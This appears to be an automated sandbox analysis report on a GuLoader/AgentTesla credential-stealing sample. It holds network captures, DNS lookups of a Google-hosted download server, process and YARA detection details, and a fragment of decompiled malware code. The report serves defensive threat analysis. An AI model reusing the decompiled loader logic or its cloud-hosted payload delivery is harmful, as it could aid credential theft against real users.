                Feb 22, 2021 14:49:16.030750036 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.032778025 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.032820940 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.032859087 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.032883883 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.034940004 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.034976006 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.034998894 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.035018921 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.037077904 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.037113905 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.037136078 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.037153959 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.039221048 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.039257050 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.039316893 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.041336060 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.041347980 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.041376114 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.041424036 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.041448116 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.043488979 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.043514967 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.043600082 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.043641090 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.045558929 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.045605898 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.045612097 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.045644999 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.047529936 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.047557116 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.047605038 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.047632933 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.049449921 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.049477100 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.049518108 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.049539089 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.051358938 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.051393032 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.051415920 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.051453114 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.053194046 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.053227901 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.053251982 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.053271055 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.055051088 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.055078030 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.055124044 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.055145025 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.056837082 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.056863070 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.056904078 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.056936026 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.058650970 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.058681011 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.058712006 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.058751106 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.059794903 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.059822083 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.059863091 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.059890985 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.060920000 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.060947895 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.060983896 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.061002970 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.062037945 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.062062979 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.062119007 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.063178062 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.063203096 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.063252926 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.063287020 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.064373016 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.064399004 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.064480066 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.065416098 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.065438986 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.065474033 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.065495968 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.066457033 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.066481113 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.066601038 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.067542076 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.067567110 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.067620039 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.068618059 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.068641901 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.068700075 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.069694996 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.069720984 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.069767952 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.069798946 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.070733070 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.070760012 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.070787907 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.070826054 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.071733952 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.071757078 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.071796894 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.071822882 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.072741032 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.072767973 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.072814941 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.072834969 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.073745012 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.073771954 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.073812008 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.073836088 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.074733973 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.074758053 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.074810028 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.074830055 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.075727940 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.075757027 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.075802088 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.075819969 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.076740026 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.076766014 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.076809883 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.076838017 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.077724934 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.077749968 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.077799082 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.077817917 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.078680992 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.078705072 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.078756094 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.078773022 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.079622984 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.079649925 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.079722881 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.079737902 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.080581903 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.080605984 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.080657959 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.080673933 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.081598043 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.081619024 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.081686020 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.082488060 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.082513094 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.082580090 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.083416939 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.083441019 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.083518982 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.083538055 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.084357977 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.084382057 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.084429979 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.084448099 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.085336924 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.085361004 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.085480928 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.086251974 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.086277962 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.086323977 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.086339951 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.087156057 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.087178946 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.087249994 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.088063002 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.088129997 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.088143110 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.088185072 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.088959932 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.088980913 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.089036942 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.089066029 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.089867115 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.089889050 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.089947939 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.090087891 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.090749025 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.090806961 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.090831995 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.090852976 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.091655970 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.091675043 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.091717005 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.091732979 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.092552900 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.092572927 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.092607021 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.092638016 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.093431950 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.093453884 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.093494892 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.093513966 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.094252110 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.094269037 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.094314098 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.094331980 CET49711443192.168.2.3142.250.186.33

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Feb 22, 2021 14:48:13.800769091 CET5696153192.168.2.38.8.8.8
                Feb 22, 2021 14:48:13.852356911 CET53569618.8.8.8192.168.2.3
                Feb 22, 2021 14:48:14.570954084 CET5935353192.168.2.38.8.8.8
                Feb 22, 2021 14:48:14.619653940 CET53593538.8.8.8192.168.2.3
                Feb 22, 2021 14:48:19.542579889 CET5223853192.168.2.38.8.8.8
                Feb 22, 2021 14:48:19.591301918 CET53522388.8.8.8192.168.2.3
                Feb 22, 2021 14:48:20.510473013 CET4987353192.168.2.38.8.8.8
                Feb 22, 2021 14:48:20.569418907 CET53498738.8.8.8192.168.2.3
                Feb 22, 2021 14:48:22.318629980 CET5319653192.168.2.38.8.8.8
                Feb 22, 2021 14:48:22.367377996 CET53531968.8.8.8192.168.2.3
                Feb 22, 2021 14:48:23.215892076 CET5677753192.168.2.38.8.8.8
                Feb 22, 2021 14:48:23.264638901 CET53567778.8.8.8192.168.2.3
                Feb 22, 2021 14:48:24.478869915 CET5864353192.168.2.38.8.8.8
                Feb 22, 2021 14:48:24.528920889 CET53586438.8.8.8192.168.2.3
                Feb 22, 2021 14:48:25.919070005 CET6098553192.168.2.38.8.8.8
                Feb 22, 2021 14:48:25.968727112 CET53609858.8.8.8192.168.2.3
                Feb 22, 2021 14:48:26.884181023 CET5020053192.168.2.38.8.8.8
                Feb 22, 2021 14:48:26.933058977 CET53502008.8.8.8192.168.2.3
                Feb 22, 2021 14:48:27.879273891 CET5128153192.168.2.38.8.8.8
                Feb 22, 2021 14:48:27.931395054 CET53512818.8.8.8192.168.2.3
                Feb 22, 2021 14:48:28.981595039 CET4919953192.168.2.38.8.8.8
                Feb 22, 2021 14:48:29.065565109 CET53491998.8.8.8192.168.2.3
                Feb 22, 2021 14:48:30.168272018 CET5062053192.168.2.38.8.8.8
                Feb 22, 2021 14:48:30.225471020 CET53506208.8.8.8192.168.2.3
                Feb 22, 2021 14:48:31.040024996 CET6493853192.168.2.38.8.8.8
                Feb 22, 2021 14:48:31.091582060 CET53649388.8.8.8192.168.2.3
                Feb 22, 2021 14:48:32.091398001 CET6015253192.168.2.38.8.8.8
                Feb 22, 2021 14:48:32.143074036 CET53601528.8.8.8192.168.2.3
                Feb 22, 2021 14:48:33.367974997 CET5754453192.168.2.38.8.8.8
                Feb 22, 2021 14:48:33.416728973 CET53575448.8.8.8192.168.2.3
                Feb 22, 2021 14:48:39.860501051 CET5598453192.168.2.38.8.8.8
                Feb 22, 2021 14:48:39.912075996 CET53559848.8.8.8192.168.2.3
                Feb 22, 2021 14:48:40.733417988 CET6418553192.168.2.38.8.8.8
                Feb 22, 2021 14:48:40.782193899 CET53641858.8.8.8192.168.2.3
                Feb 22, 2021 14:48:48.915658951 CET6511053192.168.2.38.8.8.8
                Feb 22, 2021 14:48:48.982290983 CET53651108.8.8.8192.168.2.3
                Feb 22, 2021 14:49:09.404094934 CET5836153192.168.2.38.8.8.8
                Feb 22, 2021 14:49:09.452699900 CET53583618.8.8.8192.168.2.3
                Feb 22, 2021 14:49:14.425581932 CET6349253192.168.2.38.8.8.8
                Feb 22, 2021 14:49:14.490170002 CET53634928.8.8.8192.168.2.3
                Feb 22, 2021 14:49:15.423935890 CET6083153192.168.2.38.8.8.8
                Feb 22, 2021 14:49:15.490955114 CET53608318.8.8.8192.168.2.3

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Feb 22, 2021 14:49:15.423935890 CET192.168.2.38.8.8.80xa15bStandard query (0)doc-0c-58-docs.googleusercontent.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Feb 22, 2021 14:49:15.490955114 CET8.8.8.8192.168.2.30xa15bNo error (0)doc-0c-58-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                Feb 22, 2021 14:49:15.490955114 CET8.8.8.8192.168.2.30xa15bNo error (0)googlehosted.l.googleusercontent.com142.250.186.33A (IP address)IN (0x0001)

                HTTPS Packets

                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                Feb 22, 2021 14:49:15.600152016 CET142.250.186.33443192.168.2.349711CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Jan 26 10:05:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017Tue Apr 20 11:05:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:14:48:21
                Start date:22/02/2021
                Path:C:\Users\user\Desktop\Muligheds.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\Muligheds.exe'
                Imagebase:0x400000
                File size:73728 bytes
                MD5 hash:4AA8881D2D0103703BD7301616CD8CAF
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Reputation:low

                General

                Start time:14:49:02
                Start date:22/02/2021
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\Muligheds.exe'
                Imagebase:0xe30000
                File size:64616 bytes
                MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, Author: Joe Security
                Reputation:high

                General

                Start time:14:49:03
                Start date:22/02/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6b2800000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >

                  Executed Functions

                  C-Code - Quality: 56%
                  			E0040BFCA(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				char _v40;
                  				void* _v56;
                  				void* _v72;
                  				short _v76;
                  				char _v80;
                  				long long _v88;
                  				signed int _v92;
                  				signed int _v96;
                  				char _v100;
                  				char _v104;
                  				signed int _v108;
                  				char _v112;
                  				char _v116;
                  				char _v120;
                  				intOrPtr _v128;
                  				char _v136;
                  				intOrPtr _v144;
                  				char _v152;
                  				intOrPtr _v160;
                  				char _v168;
                  				char* _v176;
                  				char _v184;
                  				intOrPtr _v192;
                  				char _v200;
                  				signed int _v208;
                  				char _v216;
                  				char _v220;
                  				char _v224;
                  				char _v228;
                  				char* _v232;
                  				char _v236;
                  				char _v240;
                  				char _v244;
                  				char _v248;
                  				intOrPtr _v252;
                  				char _v256;
                  				char _v264;
                  				signed int _v268;
                  				signed int _v272;
                  				signed int _v276;
                  				signed int _v280;
                  				intOrPtr* _v284;
                  				signed int _v288;
                  				signed int _v292;
                  				signed int _v296;
                  				signed int _v300;
                  				char _v316;
                  				char _v332;
                  				signed int _v344;
                  				signed int _v348;
                  				signed int _v352;
                  				signed int _v356;
                  				signed int _v360;
                  				intOrPtr _v364;
                  				signed int _v368;
                  				signed int _v372;
                  				signed int _v376;
                  				signed int _v380;
                  				intOrPtr* _v384;
                  				signed int _v388;
                  				signed int _v392;
                  				intOrPtr* _v396;
                  				signed int _v400;
                  				intOrPtr* _v404;
                  				signed int _v408;
                  				char _v412;
                  				signed int _v416;
                  				signed int _v420;
                  				intOrPtr* _v424;
                  				signed int _v428;
                  				intOrPtr* _v432;
                  				signed int _v436;
                  				intOrPtr* _v440;
                  				signed int _v444;
                  				intOrPtr* _v448;
                  				signed int _v452;
                  				intOrPtr* _v456;
                  				signed int _v460;
                  				signed int _v464;
                  				intOrPtr* _v468;
                  				signed int _v472;
                  				intOrPtr* _v476;
                  				signed int _v480;
                  				intOrPtr* _v484;
                  				signed int _v488;
                  				intOrPtr* _v492;
                  				signed int _v496;
                  				signed int _v500;
                  				signed int _v504;
                  				signed int _v508;
                  				intOrPtr* _v512;
                  				signed int _v516;
                  				intOrPtr* _v520;
                  				signed int _v524;
                  				intOrPtr* _v528;
                  				signed int _v532;
                  				intOrPtr* _v536;
                  				signed int _v540;
                  				intOrPtr* _v544;
                  				signed int _v548;
                  				intOrPtr* _v552;
                  				signed int _v556;
                  				intOrPtr* _v560;
                  				signed int _v564;
                  				intOrPtr* _v568;
                  				signed int _v572;
                  				signed int _v576;
                  				intOrPtr* _v580;
                  				signed int _v584;
                  				intOrPtr* _v588;
                  				signed int _v592;
                  				intOrPtr* _v596;
                  				signed int _v600;
                  				intOrPtr* _v604;
                  				signed int _v608;
                  				signed int _v612;
                  				signed int _t815;
                  				signed int _t822;
                  				signed int _t826;
                  				signed int _t830;
                  				signed int _t834;
                  				char* _t838;
                  				signed int _t842;
                  				signed int _t848;
                  				signed int _t855;
                  				signed int _t859;
                  				signed int _t863;
                  				signed int _t867;
                  				char* _t871;
                  				signed int _t875;
                  				signed int _t879;
                  				signed int _t883;
                  				signed int _t915;
                  				signed int _t919;
                  				signed int _t929;
                  				signed int _t933;
                  				signed int _t937;
                  				signed int _t941;
                  				signed int _t945;
                  				char* _t949;
                  				signed int _t953;
                  				signed int _t957;
                  				signed int _t961;
                  				char* _t963;
                  				signed int _t969;
                  				signed int _t977;
                  				char* _t983;
                  				signed int _t989;
                  				signed int _t993;
                  				signed int _t997;
                  				signed int _t1001;
                  				signed int _t1005;
                  				char* _t1009;
                  				signed int _t1013;
                  				signed int _t1017;
                  				signed int _t1021;
                  				signed int _t1046;
                  				signed int _t1050;
                  				signed int _t1054;
                  				signed int _t1058;
                  				char* _t1062;
                  				signed int _t1066;
                  				signed int _t1071;
                  				signed int _t1075;
                  				char* _t1077;
                  				signed int _t1088;
                  				signed int _t1100;
                  				signed int _t1104;
                  				signed int _t1108;
                  				signed int _t1112;
                  				char* _t1116;
                  				signed int _t1120;
                  				signed int _t1124;
                  				signed int _t1128;
                  				signed int _t1147;
                  				char* _t1150;
                  				char* _t1155;
                  				signed int _t1161;
                  				signed int _t1166;
                  				intOrPtr _t1178;
                  				intOrPtr _t1192;
                  				intOrPtr _t1196;
                  				intOrPtr _t1210;
                  				intOrPtr _t1239;
                  				intOrPtr _t1251;
                  				void* _t1285;
                  				void* _t1287;
                  				intOrPtr _t1288;
                  				long long* _t1289;
                  				void* _t1290;
                  				intOrPtr* _t1292;
                  				void* _t1293;
                  				void* _t1294;
                  				void* _t1296;
                  				long long* _t1297;
                  				intOrPtr* _t1299;
                  
                  				_t1288 = _t1287 - 0xc;
                  				 *[fs:0x0] = _t1288;
                  				L004012A0();
                  				_v16 = _t1288;
                  				_v12 = 0x4011c8;
                  				_v8 = _a4 & 0x00000001;
                  				_a4 = _a4 & 0xfffffffe;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t1285);
                  				_v176 =  &M0040B008;
                  				_v184 = 8;
                  				L004013E4();
                  				_push( &_v136);
                  				_push( &_v152); // executed
                  				L004013EA(); // executed
                  				_v192 = 0x15;
                  				_v200 = 0x8002;
                  				_push( &_v152);
                  				_t815 =  &_v200;
                  				_push(_t815);
                  				L004013F0();
                  				_v268 = _t815;
                  				_push( &_v152);
                  				_push( &_v136);
                  				_push(2);
                  				L00401432();
                  				_t1289 = _t1288 + 0xc;
                  				if(_v268 != 0) {
                  					if( *0x4103c4 != 0) {
                  						_v384 = 0x4103c4;
                  					} else {
                  						_push(0x4103c4);
                  						_push(0x40b03c);
                  						L004013DE();
                  						_v384 = 0x4103c4;
                  					}
                  					_v268 =  *_v384;
                  					_t1161 =  *((intOrPtr*)( *_v268 + 0x1c))(_v268,  &_v104);
                  					asm("fclex");
                  					_v272 = _t1161;
                  					if(_v272 >= 0) {
                  						_v388 = _v388 & 0x00000000;
                  					} else {
                  						_push(0x1c);
                  						_push(0x40b02c);
                  						_push(_v268);
                  						_push(_v272);
                  						L004013D8();
                  						_v388 = _t1161;
                  					}
                  					_v276 = _v104;
                  					_t1166 =  *((intOrPtr*)( *_v276 + 0x64))(_v276, 1,  &_v220);
                  					asm("fclex");
                  					_v280 = _t1166;
                  					if(_v280 >= 0) {
                  						_v392 = _v392 & 0x00000000;
                  					} else {
                  						_push(0x64);
                  						_push(0x40b04c);
                  						_push(_v276);
                  						_push(_v280);
                  						L004013D8();
                  						_v392 = _t1166;
                  					}
                  					_v76 = _v220;
                  					L004013D2();
                  				}
                  				if( *0x410010 != 0) {
                  					_v396 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v396 = 0x410010;
                  				}
                  				_t822 =  &_v104;
                  				L004013CC();
                  				_v268 = _t822;
